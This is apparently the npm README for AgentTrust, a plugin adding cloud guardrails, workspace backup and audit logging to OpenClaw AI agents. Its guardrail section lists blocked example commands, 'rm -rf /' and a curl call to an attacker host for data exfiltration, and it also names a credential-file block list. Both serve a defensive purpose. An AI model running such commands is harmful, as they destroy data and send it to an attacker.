@agenttrust/agenttrust
v1.0.6
Published
Cloud guardrails, audit logging, and backup for OpenClaw autonomous AI agents
Maintainers
agenttrustReadme
AgentTrust Plugin for OpenClaw
Cloud Guardrails + Backup + Audit Logging for Autonomous AI Agents
AgentTrust provides cloud-first guardrails, automatic memory backup, and immutable audit logging — powered by AgentTrust.ai.
Quick Start
# 1. Install into OpenClaw's managed plugin directory
openclaw plugins install @agenttrust/agenttrust --pin
# 2. Configure (enter your API key)
agenttrust config
# 3. Restart OpenClaw
openclaw gateway restartDone! Your agent now has cloud guardrails, automatic backups, and audit logging.
Features
✅ Cloud Guardrails (Live)
Real-time validation of tool calls against server-side security policies:
- Manifest-driven: All rules managed server-side (no client config needed)
- Selective monitoring: Only tools in manifest are validated via cloud
- Smart fallback: If cloud unreachable, per-tool fallback action applies
- Zero latency impact: Fire-and-forget with intelligent caching
- Full audit trail: Every validation logged with pattern/rule metadata
Example blocked commands:
rm -rf /→ ❌ Blocked (destructive command)curl http://attacker.com→ ❌ Blocked (data exfiltration)npm install safe-package→ ✅ Allowed (low risk)
✅ CloudBackup (Live)
Automatic snapshots of your agent's memory on every gateway restart:
Files backed up:
~/.openclaw/openclaw.json~/.openclaw/workspace/MEMORY.md~/.openclaw/workspace/SOUL.md~/.openclaw/workspace/AGENTS.md~/.openclaw/workspace/memory/(entire directory)
Deduplication: SHA-256 hashing prevents redundant storage
Cross-platform: Works on Windows, Mac, Linux (automatic path handling)
Fire-and-forget: Zero performance impact, 30s timeout
Smart limits: Respects maxFileSizeBytes, maxTotalBytes, maxFileCount from server
Security (Client-Side Enforcement):
- Backup scope: ONLY
~/.openclaw/workspace/andopenclaw.jsoncan be backed up - Credential protection:
.env,.ssh/,*.pem,*.key, credentials auto-blocked - Zero-trust: Even if server is compromised, only workspace files (minus secrets) are accessible
Retention tiers:
- Free: 7 days
- Pro: 90 days
- Ultimate: 365 days
✅ Cloud Logging (Live)
Immutable audit trail of every agent action:
- Tool calls — Every
exec,read,web_searchwith full params and outputs - Prompts — Full context before each LLM decision
- Session events — Session start, reset, stop timestamps
Where logs go:
- Local JSONL:
~/.openclaw/logs/agenttrust/audit.jsonl - Remote cloud:
POST https://agenttrust.ai/api/openclaw/cloudlogs - Fire-and-forget: 3s timeout, never blocks your agent
🚧 Coming Soon
- Time Machine UI — Restore snapshots from dashboard (v1.1)
- Ops Replay — Reconstruct full sessions from cloud logs (v1.1)
- InjectionGuard — Prompt injection detection (v1.2)
- Semantic Time Travel — Query "what did my agent know on Feb 10?" (v2.0)
Installation
1. Get an API Key
Sign up at agenttrust.ai and create an API key.
2. Install the Plugin
# Recommended: let OpenClaw install into ~/.openclaw/extensions/agenttrust
openclaw plugins install @agenttrust/agenttrust --pin
# Local development / manual install
openclaw plugins install .OpenClaw installs the package into its managed extensions directory and enables the plugin in config.
3. Configure API Key
The plugin intentionally does not mutate your OpenClaw config during npm install. Set or update your API key explicitly:
agenttrust configFor non-interactive VPS/headless setup:
agenttrust config --api-key "$AGENTTRUST_API_KEY"4. Restart OpenClaw
openclaw gateway restart5. Verify It's Working
Check gateway logs after restart:
tail -20 ~/.openclaw/logs/agenttrust/audit.jsonlYou should see backup events:
{"ts":"2026-02-20T13:49:09.035Z","hook":"gateway_start","level":"info","data":{"message":"CloudBackup: uploaded ... files"}}Configuration
Plugin config lives in ~/.openclaw/openclaw.json under plugins.agenttrust:
{
"plugins": {
"agenttrust": {
"enabled": true,
"cloudBackup": {
"enabled": true,
"endpoint": "https://agenttrust.ai"
},
"cloudLogging": {
"enabled": true,
"endpoint": "https://agenttrust.ai",
"logLevel": "standard",
"hooks": [
"before_tool_call",
"after_tool_call",
"before_prompt_build",
"command:new",
"command:reset",
"command:stop"
]
}
}
}
}Config Reference
CloudBackup
| Key | Type | Default | Description |
|-----|------|---------|-------------|
| enabled | boolean | true | Toggle automatic backups |
| endpoint | string | https://agenttrust.ai | Server endpoint |
Cloud Logging
| Key | Type | Default | Description |
|-----|------|---------|-------------|
| enabled | boolean | true | Toggle cloud logging |
| endpoint | string | https://agenttrust.ai | Server endpoint |
| logLevel | string | "standard" | Log verbosity: minimal, standard, verbose |
| hooks | string[] | [...] | Which OpenClaw hooks to log |
How It Works
CloudBackup Flow
Gateway Start
↓
GET /api/openclaw/backup/manifest
↓ (server returns paths to back up)
Collect files from paths
↓ (SHA-256 hash each file)
POST /api/openclaw/backup/upload
↓ (server deduplicates + stores)
Done (fire-and-forget, ~30s max)Manifest-driven: Server tells plugin what to back up. No hardcoded paths in plugin.
Deduplication: Files with identical SHA-256 hashes reuse existing blobs in Cloud Storage.
Skipped files tracked: summary.skipped reports tooLarge, excluded, unreadable, limitReached.
Cloud Logging Flow
Agent action (tool call, prompt, session event)
↓
Extract event data (params, timestamp, session, etc.)
↓
Write to local JSONL (~/.openclaw/logs/agenttrust/audit.jsonl)
↓
POST to cloud endpoint (fire-and-forget, 3s timeout)
↓
Done (agent never waits)Event types:
tool_call_start— Before tool executiontool_call_end— After tool completes (includes output + duration)prompt— Before LLM call (full prompt context)session_new,session_reset,session_stop— Session lifecycle
Log Files
Logs are written to ~/.openclaw/logs/agenttrust/audit.jsonl in JSONL format (one JSON object per line).
Example entries:
{"ts":"2026-02-20T13:49:09.035Z","hook":"gateway_start","level":"info","session":"045d8da7-956d-4502-9735-022e93d26d00","agent":"agent:main:main","data":{"message":"CloudBackup: uploading 15 files (68696 bytes)"}}
{"ts":"2026-02-20T13:49:19.998Z","hook":"before_tool_call","level":"verbose","session":"045d8da7-956d-4502-9735-022e93d26d00","agent":"agent:main:main","data":{"toolName":"exec","params":{"command":"openclaw gateway restart","timeout":10}}}
{"ts":"2026-02-20T13:49:20.123Z","hook":"after_tool_call","level":"standard","session":"045d8da7-956d-4502-9735-022e93d26d00","agent":"agent:main:main","data":{"toolName":"exec","success":false,"durationMs":125}}Troubleshooting
Plugin not loading?
- Check
openclaw gateway restartoutput for errors - Verify plugin directory exists:
ls ~/.openclaw/extensions/agenttrust/
No backups happening?
- Check API key is set:
grep AGENTTRUST_API_KEY ~/.openclaw/workspace/.env - Check logs:
tail ~/.openclaw/logs/agenttrust/audit.jsonl - Test manifest endpoint:
curl -H "Authorization: Bearer YOUR_KEY" https://agenttrust.ai/api/openclaw/backup/manifest
Backups timing out?
- Large workspaces may hit 30s limit
- Check server-side limits:
maxFileSizeBytes,maxTotalBytes,maxFileCount - Review
summary.skippedin upload logs
Cross-platform path issues?
- Plugin uses
os.homedir()+path.join()— paths should work everywhere - Server sends
~/.openclaw/...notation (works on all platforms)
API endpoint unreachable?
- Plugin fails silently (fire-and-forget)
- Local JSONL logging continues working
- Check network/firewall
Roadmap
- [x] v0.9.0-beta — CloudBackup + Cloud Logging
- [x] v1.0.0 — Cloud Guardrails (manifest-driven tool validation)
- [ ] v1.1.0 — Time Machine restore UI + Ops Replay
- [ ] v1.2.0 — InjectionGuard
- [ ] v2.0.0 — Semantic Time Travel (query agent memory at specific dates)
Support
- Dashboard: agenttrust.ai
- Docs: This README + plugin source code
- Issues: github.com/agenttrust/agenttrust/issues
License
MIT — See LICENSE